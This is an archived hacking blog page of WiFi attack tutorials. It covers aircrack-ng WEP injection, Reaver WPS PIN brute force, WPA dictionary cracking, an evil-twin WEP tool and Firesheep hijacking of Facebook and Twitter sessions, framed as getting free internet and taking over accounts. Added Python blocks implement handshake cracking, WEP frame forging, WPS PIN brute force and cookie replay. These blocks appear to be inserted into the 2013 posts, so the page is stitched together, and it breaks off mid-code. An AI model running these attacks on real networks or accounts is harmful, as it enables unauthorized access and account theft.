Showing posts with label Wireless. Show all posts

Friday, October 18, 2013

[WiFi Password Dump] Command-line Tool to Recover Wireless Passwords



WiFi Password Dump is a free command-line tool to quickly recover all the wireless account passwords stored on your system.

It automatically recovers all types of wireless keys/passwords (WEP/WPA/WPA2 etc.) stored by the Windows Wireless Configuration Manager.

For each recovered WiFi account, it displays the following information:
  • WiFi Name (SSID)
  • Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP)
  • Password Type
  • Password in hex format
  • Password in clear text
Being a command-line tool makes it useful for penetration testers and forensic investigators (it runs on the machine whose profiles you want, so it belongs in a post-exploitation or forensic image workflow, not an over-the-air attack). For the GUI version, check out Wi-Fi Password Decryptor.

Sunday, October 6, 2013

Wep0ff – Wireless WEP Key Cracker Tool

Wep0ff is a new tool to crack a WEP key without access to the AP, by mounting a fake access point attack against WEP-based wireless clients.
It uses a combination of fragmentation and evil twin attacks to generate traffic which can be used for KoreK-style WEP key recovery: the client is lured onto the fake AP and keeps encrypting frames with the real network's WEP key, and the fragmentation attack turns the known plaintext in those frames into keystream that can be used to inject traffic and collect the IVs aircrack-ng needs.




This code was tested with patched madwifi-old drivers with athraw support, but it also works with madwifi-ng. With madwifi-ng you need to create two virtual interfaces: one in master mode (for the fake AP) and a second in monitor mode (to listen on).
How to Use:
1. Set up a fake AP with KARMA tools or iwconfig
_______________________________________________________
  1. iwpriv ath0 mode 2
  2. iwconfig ath0 mode master essid foo enc 1122334455 channel 7
  3. echo 1 > /proc/sys/dev/ath0/rawdev
  4. echo 1 > /proc/sys/dev/ath0/rawdev_type
  5. ifconfig ath0 up
  6. ifconfig ath0raw up
______________________________________________________
2. Start this program (./wep0ff ath0raw 00:01:02:03:04:05)
3. Wait until a client connects to the fake access point
4. Launch airodump-ng to collect packets
5. Launch aircrack-ng to recover the WEP key
You can download it here:

Friday, October 4, 2013

How to Crack WPA2 ccmp with Backtrack 5

Hey guys, the day before yesterday I made a tutorial on WEP cracking using a built-in tool called "fern wifi cracker". Today I'll show you how to crack WPA2 CCMP using the same tool, so let us begin.
  • Open fern wifi cracker

  • Select the wireless interface from the list.
  • When you select your card, a window will open. Ignore it, just click OK.
  • Double-click anywhere on the tool to get the settings and then enable xterm from there. (The window that appeared above was just informing you about the "settings".)
  • Now click on the button with the WiFi logo on it; scanning will start when you click it.
  • Now you will be able to see the xterms running the WEP and WPA scans (it uses airodump-ng). *In the picture I actually closed the xterm for WEP.
  • Now click on the button which says "WPA". A window will open; click the AP in the list and then select a wordlist for the WPA2 CCMP cracking (dictionary attack).
  • Select a client which you want to disconnect (deauth) from the AP from the list and run "Attack".

  • After a few seconds (or minutes) you will see one xterm appear which is sniffing the AP (actually waiting for the WPA handshake) and another xterm appearing every 3-4 seconds (this xterm is trying to deauthenticate the client by sending "Deauth" frames, so that it reconnects and produces a fresh four-way handshake).
  • Once you have the WPA handshake, the tool starts the dictionary attack automatically; if the password is in the wordlist it will be displayed in the window. Note that CCMP versus TKIP makes no difference here: the attack is against the pre-shared key via the handshake, and it only succeeds if the passphrase is in the wordlist.

Okay, this is it for WPA2 CCMP cracking, I hope you liked it. :)
______________________________________________________________________________________

Tuesday, September 24, 2013

WPA/WPA2 Bruteforcing Tool - Pyrit

1) Install Pyrit in BackTrack if you don't have it; here is the tutorial: http://www.backtrack-linux.org/forums/showthread.php?t=40360

2) Get your handshake .cap file. Tutorial here: http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Screenshots:




Now follow the screenshot tutorial from 1 to 7. Make sure you replace "d4rk50ld13r-01.cap" with your handshake file, and that you have an .lst wordlist file in /pentest/passwords/wordlists.
I used darkc0de.lst but you can use any wordlist file you want, as long as it is placed in the right directory!
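What fern's WPA attack (above) and Pyrit both do once they hold a handshake is the same loop, shown here as an added example that is not Pyrit's, fern's or aircrack-ng's own code: derive the PMK from each candidate passphrase with PBKDF2, expand it to the PTK, and check whether the key-confirmation key reproduces the MIC in the captured EAPOL message 2. The handshake is constructed in make_handshake() from a known passphrase so the block runs offline; the MAC addresses, nonces and the minimal EAPOL-Key frame layout are constructed test data, not values from the page.

```python
# Added example (not Pyrit's or aircrack-ng's code): a WPA/WPA2-PSK dictionary
# attack against a four-way handshake. The handshake is constructed below from
# a known passphrase so everything runs offline; a real one comes from the .cap.
import hashlib
import hmac
from typing import Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    # These 4096 rounds per candidate are the cost Pyrit moves onto the GPU.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    # IEEE 802.11i PRF-512; only the KCK (first 16 bytes) is needed to verify a MIC.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:64]


MIC_OFFSET = 81  # offset of the 16-byte Key MIC inside the EAPOL-Key frame built below


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    # WPA2/CCMP (descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_m2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    # Minimal EAPOL-Key message 2 (constructed; no key data): 4-byte 802.1X header
    # followed by a 95-byte key descriptor.
    body = (b"\x02"                                   # descriptor type: RSN
            + b"\x01\x0a"                             # key info: pairwise, MIC set, version 2
            + b"\x00\x10"                             # key length 16
            + (1).to_bytes(8, "big")                  # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)  # nonce, IV, RSC, key ID
            + mic + b"\x00\x00")                      # MIC, key data length 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def make_handshake(passphrase: str, ssid: str) -> dict:
    # Constructed stand-in for what airodump-ng captures: addresses, both nonces,
    # and the supplicant's MIC-bearing message 2.
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
    frame = build_m2(snonce, eapol_mic(kck, build_m2(snonce)))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": frame}


def dictionary_attack(hs: dict, wordlist) -> Optional[str]:
    # One PBKDF2 per candidate; the captured MIC is the only oracle needed.
    captured_mic = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        pmk = pmk_from_passphrase(word, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), captured_mic):
            return word
    return None


if __name__ == "__main__":
    hs = make_handshake("correct horse", "HomeNet")
    print(dictionary_attack(hs, ["password", "12345678", "correct horse"]))  # correct horse
```

The check is entirely offline: nothing is sent to the AP after the handshake is captured, which is why deauthenticating one client to force a fresh handshake is the only active step in the whole attack, and why the passphrase's absence from the wordlist simply means no result.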

Screenshot:



Hack WiFi Password on iPhone 3G/3GS/4G (Genuine)





Easy steps, and have fun with free Internet on iPhone/iPod...
1) Install aircrack from this repo:
apt.cloudrepo.com
2) Set every file's permissions to 777 (far broader than needed; only the aircrack-ng binary has to be executable)
3) Open Terminal in WinSCP from /var/
4) Enter the following command:
sysctl -w security.mac.proc_enforce=0 security.mac.vnode_enforce=0 /aircrack

(This turns off the kernel's code-signing enforcement on the jailbroken device so the unsigned binary is allowed to run.)

5) Go to the iPod/iPhone
6) Type the following command to run it on the device:
/var/aircrack/aircrack-ng -a 1 /var/aircrack/touch.ivs

If it says "Killed", you didn't do step 4 properly. Good luck!

(/var/aircrack/aircrack-ng) = the file the terminal will run; (-a 1) = the type of encryption, which is WEP; (/var/aircrack/touch.ivs) = where the packets are saved. This is simply a sample file, as the device can't capture new packets yet.

NOTE: This DOESN'T work FULLY yet. All this does is crack a sample file supplied with it; it cannot crack a WiFi network on its own yet.

WPA/WPA2 Bruteforcing and Hacking Tool: Reaver

Reaver is a WPA/WPA2 brute-forcing and hacking tool. It takes advantage of a weakness in Wi-Fi Protected Setup (WPS), a feature that exists on many routers, intended to provide an easy setup process, and tied to an 8-digit PIN that is hard-coded into the device. The flaw is in how the PIN is checked: the router confirms the first four digits separately from the last four, and the last digit is only a checksum, so an attacker needs at most 11,000 guesses instead of 100 million. The result is that, with enough time, Reaver can reveal your WPA or WPA2 password.

In this tutorial we will explain how to hack a secured WiFi network with Reaver.

First of all, you must have some prerequisites already installed:

  1. You must be running Backtrack Linux.
  2. You must have a wireless card capable of raw injection.
  3. You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite. 

Now, how to install Reaver

Reaver has been added to the bleeding-edge version of BackTrack, but it's not yet incorporated in the live DVD, so as of this writing you need to install Reaver before proceeding. (Eventually, Reaver will simply be incorporated in BackTrack by default.) To install Reaver, you'll first need to connect to a WiFi network that you have the password to.


  1. Click Applications > Internet > Wicd Network Manager
  2. Select your network and click Connect, enter your password if necessary, click OK, and then click Connect a second time.


Now that you're online, let's install Reaver. Click the Terminal button in the menu bar (or click Applications > Accessories > Terminal). At the prompt, type:
 
apt-get update

And then, after the update completes:
 
apt-get install reaver


If all went well, Reaver should now be installed. It may seem a little lame that you need to connect to a network to do this, but it will remain installed until you reboot your computer (on a live DVD nothing persists across a reboot).

Find your wireless card: 

Inside Terminal, type:
 
iwconfig
 
[screenshot]
Press Enter. You should see a wireless device in the subsequent list. Most likely, it'll be named wlan0, but if you have more than one wireless card, or a more unusual networking setup, it may be named something different.

Put your wireless card into monitor mode:

Assuming your wireless card's interface name is wlan0, execute the following command to put your wireless card into monitor mode:
 
airmon-ng start wlan0


This command will output the name of the monitor-mode interface, which you'll also want to make note of. Most likely it'll be mon0, like in the screenshot below.

[screenshot]

Find the BSSID of the router you want to crack: 

Lastly, you need to get the unique identifier (BSSID) of the router you're attempting to crack so that you can point Reaver in the right direction. To do this, execute the following command:
 
airodump-ng wlan0

(Note: airodump-ng needs a monitor-mode interface, so if airodump-ng wlan0 doesn't work for you, use the monitor interface instead, e.g. airodump-ng mon0.)

You'll see a list of the wireless networks in range—it'll look something like the screenshot below:
[screenshot]


When you see the network you want, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (it's the series of letters, numbers, and colons on the far left). The network should have WPA or WPA2 listed under the ENC column. (If it's WEP, use our previous guide to cracking WEP passwords.)


Now, with the BSSID and monitor interface name in hand, you've got everything you need to start up Reaver.

Step 4: Crack a Network's WPA Password with Reaver

Now execute the following command in the Terminal, replacing bssid and moninterface with the BSSID and monitor interface you copied down above:
 
reaver -i moninterface -b bssid -vv

For example, if your monitor interface was mon0 like mine, and your BSSID was 8D:AE:9D:65:1F:B2 (a BSSID I just made up), your command would look like:
 
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv

Press Enter, sit back, and let Reaver work its disturbing magic. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my successful test, Reaver took 2 hours and 30 minutes to crack the network and deliver the correct password. As mentioned above, the Reaver documentation says it can take between 4 and 10 hours, so it could take more or less time than I experienced, depending. When Reaver's cracking has completed, it'll look like this:
[screenshot]

A few important factors to consider: 

Reaver worked exactly as advertised in my test, but it won't necessarily work on all routers (see more below). Also, the router you're cracking needs to have a relatively strong signal, so if you're hardly in range of a router, you'll likely experience problems, and Reaver may not work. Throughout the process, Reaver would sometimes experience a timeout, sometimes get locked in a loop trying the same PIN repeatedly, and so on. I just let it keep on running, and kept it close to the router, and eventually it worked its way through.


Also of note, you can pause your progress at any time by pressing Ctrl+C while Reaver is running. This will quit the process, but Reaver will save any progress so that next time you run the command you can pick up where you left off, as long as you don't shut down your computer (which, if you're running off a live DVD, will reset everything).

How to Protect Yourself Against Reaver Attacks

Since the vulnerability lies in the implementation of WPS, your network should be safe if you can simply turn off WPS (or, even better, if your router doesn't support it in the first place). Unfortunately, as Gallagher points out at Ars, even with WPS manually turned off through his router's settings, Reaver was still able to crack his password. Some firmware keeps answering WPS PIN attempts regardless of what the web UI says, so the only reliable check is to scan your own AP (with wash, for example) and confirm it no longer advertises WPS.

Tuesday, September 17, 2013

Hack Facebook and Twitter Password on Wifi Networks

1. Download the Firesheep Firefox extension. This is a freeware extension for the Firefox browser.





2. Once installed, it will open a sidebar window in your Firefox browser.

3. Now it will show all the people who are connected to the unsecured WiFi network. Once they log in to their Facebook or Twitter account you will get a notification, and with a single click you can log in to their account.
This whole thing works on the technique of cookie hijacking (session sidejacking). Once your session cookie is captured, anybody can log in to your account. These cookies can be easily captured on an unsecured WiFi network because the site sends them over plain HTTP, where anyone on the same network can read them.

The best way to protect yourself from such a hacking trick is to avoid using your Facebook or Twitter accounts on unsecured WiFi networks, as it is a security lapse on the websites' side, not yours: a site that serves every page over HTTPS and marks its session cookie Secure does not leak it this way.
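An added example (not Firesheep's code) of the two halves of what the post describes: the sidejacking view of a plain-HTTP request, where Host and Cookie travel in clear and replaying the Cookie header is the whole "single click", and the server-side check that tells you whether a site is exposed, i.e. whether its session cookie is sent without the Secure attribute. The captured request and response are constructed here; the cookie names and values are made up for the example.

```python
# Added example (not Firesheep's code): what a sidejacking tool extracts from an
# open WiFi network, and the Set-Cookie audit that shows whether a site is exposed.
# CAPTURED_REQUEST / CAPTURED_RESPONSE are constructed, not real traffic.
from typing import Dict, List, Tuple

# Constructed: a plain-HTTP request and the server's reply as seen on the air.
CAPTURED_REQUEST = (b"GET /home.php HTTP/1.1\r\n"
                    b"Host: www.facebook.com\r\n"
                    b"Cookie: c_user=100001; xs=0a1b2c3d; datr=abc\r\n\r\n")
CAPTURED_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                     b"Set-Cookie: xs=0a1b2c3d; path=/; HttpOnly\r\n"
                     b"Set-Cookie: datr=abc; path=/; Secure; HttpOnly\r\n\r\n")


def parse_http_headers(raw: bytes) -> Tuple[str, Dict[str, List[str]]]:
    # Split the head of an HTTP message into its start line and a name -> values map.
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def sidejack_view(raw_request: bytes) -> Tuple[str, Dict[str, str]]:
    # Firesheep's view: on plain HTTP the Host and Cookie headers are readable by
    # anyone on the network, and the cookies alone identify the logged-in user.
    _, headers = parse_http_headers(raw_request)
    cookies: Dict[str, str] = {}
    for hdr in headers.get("cookie", []):
        for part in hdr.split(";"):
            name, _, value = part.strip().partition("=")
            if name:
                cookies[name] = value
    return headers.get("host", [""])[0], cookies


def replay_request(host: str, cookies: Dict[str, str], path: str = "/") -> bytes:
    # The "single click": a fresh request carrying the victim's cookies is all the
    # site needs to treat the attacker as that user. No password is involved.
    cookie_hdr = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie_hdr}\r\n\r\n").encode()


def audit_set_cookie(raw_response: bytes) -> List[str]:
    # Server-side check: a session cookie without Secure is also sent over plain
    # HTTP, which is exactly the condition sidejacking needs; HttpOnly is the
    # companion flag that keeps it away from script.
    _, headers = parse_http_headers(raw_response)
    findings = []
    for sc in headers.get("set-cookie", []):
        name = sc.split("=", 1)[0].strip()
        attrs = {a.strip().split("=")[0].lower() for a in sc.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"{name}: missing Secure (sent over plain HTTP)")
        if "httponly" not in attrs:
            findings.append(f"{name}: missing HttpOnly (readable by script)")
    return findings


if __name__ == "__main__":
    host, cookies = sidejack_view(CAPTURED_REQUEST)
    print(host, cookies)
    print(replay_request(host, cookies, "/home.php").decode())
    print(audit_set_cookie(CAPTURED_RESPONSE))
```

Run the audit against any site you operate: every cookie it reports as missing Secure is one a Firesheep-style tool can lift from an open network, and the fix is on the server (HTTPS everywhere plus the Secure attribute), not on the user's WiFi choice.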

Hack wireless work 100%




Today i'm going to show you how to Crack WEP and WPA/WPA2-PSK passwords!

I'm using BackTrack 5 R3 because the tools that I'm going to use come already installed, but you can use any other Linux distribution!

WEP Cracking

What is Aircrack-NG?

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
In fact, Aircrack-ng is a set of tools for auditing wireless networks.

How do I use this tool?

Simple, just follow my tutorial and you'll be able to crack ALMOST any WEP-encrypted password.

These are active attacks (you inject frames rather than just listening), which means that you have to be near the target router in order for this to work. About 50% signal should be good.

Let's Begin.

Open up a terminal and type:

airmon-ng

This will show you your wireless card name. In my case it is called wlan1, but I also have wlan0.

Now we need to set the wireless card to monitor mode. To do that, type:

airmon-ng start wlan1

Ok, your wireless card is now in monitor mode. If you type airmon-ng again, it'll show you mon0.

After that, type:

airodump-ng mon0

When you press Enter, it should show you all the access points near you.
Copy the BSSID and remember the channel number of the target AP.

Press CONTROL+C to cancel. Do this only when you have found and copied the info about the target AP.

Now, type:

airodump-ng -c [channel number] --bssid [bssid] -w wep mon0

You should now start receiving DATA (for a WEP network the #Data column counts captured frames with unique IVs, which is what the key recovery needs).

To speed up this process, open up another terminal and type:

aireplay-ng -1 0 -a [BSSID] mon0

This is a fake authentication: it associates your card with the AP so that the AP will accept frames injected from it. After it says it was successful, type:

aireplay-ng -3 -b [BSSID] mon0

This is the ARP request replay attack: it waits for an ARP request from a real client and re-injects it, and every replay makes the AP answer with a new encrypted frame, i.e. a new IV. After some seconds this should appear:

[screenshot]

When you reach 20000 DATA packets, which will be really quick if you did what I said above, open another terminal and type:

aircrack-ng wep-01.cap

Now wait for some minutes and it should give you the PASSWORD!

The password is:
EF855844B288E4BB1BA9ADF14D
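Why a WEP client that merely keeps talking is enough, both for the injection step above and for the Wep0ff fragmentation/evil-twin approach earlier on the page, shown as an added example that is not aircrack-ng's or Wep0ff's code: every ARP or IP frame starts with the same LLC/SNAP header, so XORing that known plaintext against the ciphertext of any frame hands back the RC4 keystream for that frame's IV. With keystream in hand you can forge a short valid frame (including a correct ICV) without ever knowing the key, which is the building block the fragmentation attack repeats to grow its keystream, and you can read the start of any other frame sent under the same reused IV. The key, IV and frames below are constructed for the example.

```python
# Added example (not aircrack-ng's or Wep0ff's code): WEP keystream recovery from
# known plaintext, keyless frame forging, and what IV reuse leaks. Key, IV and
# frames are constructed here.
import zlib
from typing import Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    # Plain RC4 (KSA + PRGA); WEP seeds it with IV || key.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    # Frame body = IV (3 bytes, sent in clear) || RC4(IV || key, payload || CRC-32 ICV).
    icv = zlib.crc32(payload).to_bytes(4, "little")
    return iv + rc4(iv + key, payload + icv)


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    # What the AP does on receipt: strip IV, decrypt, verify the ICV.
    iv, body = frame[:3], frame[3:]
    plain = rc4(iv + key, body)
    payload, icv = plain[:-4], plain[-4:]
    if zlib.crc32(payload).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch")
    return payload


LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")  # first 8 plaintext bytes of every ARP frame


def recover_keystream(frame: bytes, known_plaintext: bytes) -> Tuple[bytes, bytes]:
    # ciphertext XOR known plaintext = keystream; the clear-text IV says which keystream it is.
    iv, body = frame[:3], frame[3:]
    return iv, bytes(c ^ p for c, p in zip(body, known_plaintext))


def forge_frame(iv: bytes, keystream: bytes, payload: bytes) -> bytes:
    # Any payload up to len(keystream) - 4 bytes can be sealed with a correct ICV
    # without the key. The fragmentation attack sends 4-byte fragments like this
    # until the AP reassembles and re-encrypts a full frame, yielding ~1500 bytes
    # of keystream for that IV.
    data = payload + zlib.crc32(payload).to_bytes(4, "little")
    if len(data) > len(keystream):
        raise ValueError("not enough keystream")
    return iv + bytes(d ^ k for d, k in zip(data, keystream))


def demo(key: bytes, iv: bytes) -> dict:
    # A client's ARP frame (constructed) as sniffed from the air.
    arp_frame = wep_encrypt(key, iv, LLC_SNAP_ARP + bytes(20))
    _, ks = recover_keystream(arp_frame, LLC_SNAP_ARP)
    forged = forge_frame(iv, ks, b"\x01\x02\x03\x04")       # sealed without the key
    other = wep_encrypt(key, iv, b"HELLO123" + bytes(4))   # another frame, same IV reused
    return {"keystream": ks,
            "forged_ok": wep_decrypt(key, forged) == b"\x01\x02\x03\x04",
            "leaked": bytes(c ^ k for c, k in zip(other[3:], ks))}


if __name__ == "__main__":
    print(demo(bytes.fromhex("0102030405"), bytes.fromhex("070809")))
```

The 24-bit IV is the whole problem: a busy network repeats IVs within hours, so keystream recovered once stays useful, and the replay attack above simply makes the AP produce fresh IV/keystream pairs faster than it naturally would until aircrack-ng has enough of them.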



WPA/WPA2-PSK Cracking

Reaver

What is Reaver?

Reaver implements a brute force attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS PIN and recover the passphrase. The reason it is feasible at all is that the AP confirms the two halves of the PIN separately and the last digit is a checksum, so there are at most 11,000 PINs to try rather than 100 million.

How do i use this tool?

As said above, just follow this tutorial :)

NOTE: Reaver doesn't need any dictionary files!

First, type:
airmon-ng
As said earlier, this shows you your wireless card name.

I'll use wlan0

We need to set the wireless card to monitor mode, so type:
airmon-ng start wlan0
After that, type:
airodump-ng mon0

Now, copy the BSSID of the target AP.
Press CONTROL+C to cancel

To see the APs that have WPS enabled (the only ones this attack applies to), type:
wash -i mon0
If the target AP is a candidate, it should say:
WPS Locked: No
(A locked AP has stopped answering PIN attempts, usually after too many failures, and Reaver will get nowhere until it unlocks.)

Now, to start the attack, type:
reaver -i mon0 -b [BSSID] -vv

Now you'll need to wait around 2-10 hours.

If the AP is limiting you with a message saying:
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying
AND

if Reaver says that it is trying the same PIN over and over, press CONTROL+C to cancel, then type:
reaver --help
This will show you the help menu; you can start playing with the options that you have.

I usually add: -c -S -L
reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vv
Here -c pins Reaver to the AP's channel, -S uses small Diffie-Hellman secrets to speed up each exchange, and -L ignores the locked state the AP reports. This one works great for me, so keep playing with the options until it works!

When it reaches 100% it should give you some lines; the password is the one after:
WPS PSK: 'PASSWORD HERE'
And here it is!

You should also remember the PIN.
WPS PIN: PIN HERE
Now, let's say for some reason the router's owner changed the password for his WiFi.

Since you already have the PIN, type:
reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv
And it should give you the password in a matter of seconds, because the PIN is what the router authenticates, and it hands the current passphrase to anyone who proves they know it.
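Both Reaver tutorials on this page (the earlier one that gives the 4-10 hour estimate and this one that re-uses a known PIN with -p) rest on the same two facts, shown here as an added example that is not Reaver's code: the eighth PIN digit is a checksum over the other seven, and the AP answers the first four digits and the last four separately, so the search is 10,000 + 1,000 attempts instead of 10^8. The access point is simulated by the constructed WpsRegistrar class, which models the two EAP-NACK decision points of the WPS exchange; the PIN, passphrase and attempt counts are made up for the example.

```python
# Added example (not Reaver's code): why a WPS registrar PIN falls in at most
# 11,000 guesses, and why a known PIN still yields the passphrase after the owner
# changes it. WpsRegistrar is a constructed stand-in for the AP.
from typing import Optional, Tuple


def wps_checksum(first7: int) -> int:
    # The 8th PIN digit is a checksum over the first seven (WPS spec formula).
    acc = 0
    while first7:
        acc += 3 * (first7 % 10)
        first7 //= 10
        acc += first7 % 10
        first7 //= 10
    return (10 - acc % 10) % 10


def make_pin(first7: str) -> str:
    return first7 + str(wps_checksum(int(first7)))


class WpsRegistrar:
    """Constructed model of the AP side of the WPS PIN exchange."""

    def __init__(self, first7: str, passphrase: str):
        self.pin = make_pin(first7)
        self.passphrase = passphrase
        self.attempts = 0

    def try_first_half(self, p1: str) -> bool:
        # A real AP answers M4 with an EAP-NACK when the first four digits are wrong,
        # which tells the attacker that half is wrong before the second half is ever sent.
        self.attempts += 1
        return p1 == self.pin[:4]

    def try_second_half(self, pin: str) -> Optional[str]:
        # A real AP answers M6 with an EAP-NACK when the last four are wrong, otherwise
        # M7 carries the network credential (the current WPA/WPA2 passphrase).
        self.attempts += 1
        return self.passphrase if pin == self.pin else None


def brute_force_pin(ap: WpsRegistrar) -> Tuple[str, str, int]:
    # Phase 1: up to 10^4 candidates for the first half. Phase 2: up to 10^3 for the
    # second half, since the 8th digit is computed rather than guessed.
    p1 = next(f"{i:04d}" for i in range(10_000) if ap.try_first_half(f"{i:04d}"))
    for j in range(1000):
        pin = make_pin(p1 + f"{j:03d}")
        psk = ap.try_second_half(pin)
        if psk is not None:
            return pin, psk, ap.attempts
    raise RuntimeError("no PIN accepted")


def recover_with_known_pin(ap: WpsRegistrar, pin: str) -> Optional[str]:
    # reaver -p PIN: one exchange, no brute force, even after the passphrase changed.
    return ap.try_second_half(pin)


def search_space() -> Tuple[int, int]:
    # (naive 8-digit space, actual space given the split check and the checksum)
    return 10 ** 8, 10 ** 4 + 10 ** 3


if __name__ == "__main__":
    ap = WpsRegistrar("2345678", "OldPassphrase!")
    print(brute_force_pin(ap))                      # ('23456785', 'OldPassphrase!', 3025)
    ap.passphrase = "NewPassphrase!"
    print(recover_with_known_pin(ap, "23456785"))   # NewPassphrase!
```

The model deliberately leaves out the rate limiting and lock-out that the tutorial runs into ("Detected AP rate limiting", "WPS Locked: Yes" in wash); those are the AP's only defences once WPS is on, which is why disabling WPS entirely, and verifying with wash that it really is off, is the fix rather than a stronger passphrase.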

Saturday, September 14, 2013

[Router Password Decryptor] Tool to Recover Login/PPPoE/WEP/WPA/WPA2 Passwords from Router/Modem Config file








Router Password Decryptor is a FREE tool to instantly recover internet login/PPPoE authentication passwords, wireless WEP keys and WPA/WPA2 passphrases from your router/modem configuration file.

Currently it supports password recovery from the following types of routers/modems:

Cisco
Juniper
DLink
BSNL

(Instant recovery is possible because these configs store credentials under reversible obfuscation rather than hashing; Cisco "type 7" and Juniper "$9$" passwords are the usual examples.)

In addition to this, it also has a unique 'Smart Mode' feature (experimental) to recover passwords from any type of router/modem configuration file. It detects the various password fields in such a config file (XML only) and then automatically tries to decrypt those passwords.

It also has a quick link to a Base64 decoder, which is useful in case you have found a Base64-encoded password (ending with =) in the config file and automatic recovery is not working.

It is a very easy to use tool with a clean GUI. Administrators and penetration testers will find it useful to recover login passwords as well as wireless keys from router configuration files.
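What a "Smart Mode" pass over an XML config export amounts to, as an added example that is not Router Password Decryptor's code: walk the document, pick out elements and attributes whose names look like credential fields, and apply the Base64 decoding the tool offers to values that are syntactically Base64 (typically ending in =), keeping only decodings that come out as printable text. The config below is constructed, and its tag names (pppoe, psk, wepkey, login_password) are assumptions for the example, not a real vendor schema.

```python
# Added example (not Router Password Decryptor's code): credential-field discovery
# and Base64 recovery over a router config export. SAMPLE_CONFIG is constructed and
# its tag names are assumptions, not any vendor's real schema.
import base64
import re
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

FIELD_PATTERN = re.compile(r"(pass|pwd|psk|secret|key|passphrase)", re.IGNORECASE)
B64_PATTERN = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def try_base64(value: str) -> Optional[str]:
    # Decode only when the value is syntactically Base64 and decodes to printable
    # text; a hex WEP key or a hash fails one of those tests and is left alone.
    if not B64_PATTERN.match(value) or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None


def find_credentials(config_xml: str) -> List[Tuple[str, str, Optional[str]]]:
    # Returns (path, raw value, decoded value or None) for every field whose element
    # or attribute name looks like a credential.
    root = ET.fromstring(config_xml)
    found: List[Tuple[str, str, Optional[str]]] = []

    def walk(elem, path):
        here = f"{path}/{elem.tag}"
        if FIELD_PATTERN.search(elem.tag) and (elem.text or "").strip():
            value = elem.text.strip()
            found.append((here, value, try_base64(value)))
        for name, value in elem.attrib.items():
            if FIELD_PATTERN.search(name):
                found.append((f"{here}@{name}", value, try_base64(value)))
        for child in elem:
            walk(child, here)

    walk(root, "")
    return found


# Constructed sample: a PPPoE password and admin password stored as Base64, a WPA
# PSK stored as Base64, and a WEP key stored as raw hex (which must not be "decoded").
SAMPLE_CONFIG = """<config>
  <wan><pppoe username="user@isp" password="cGFzc3dvcmQxMjM="/></wan>
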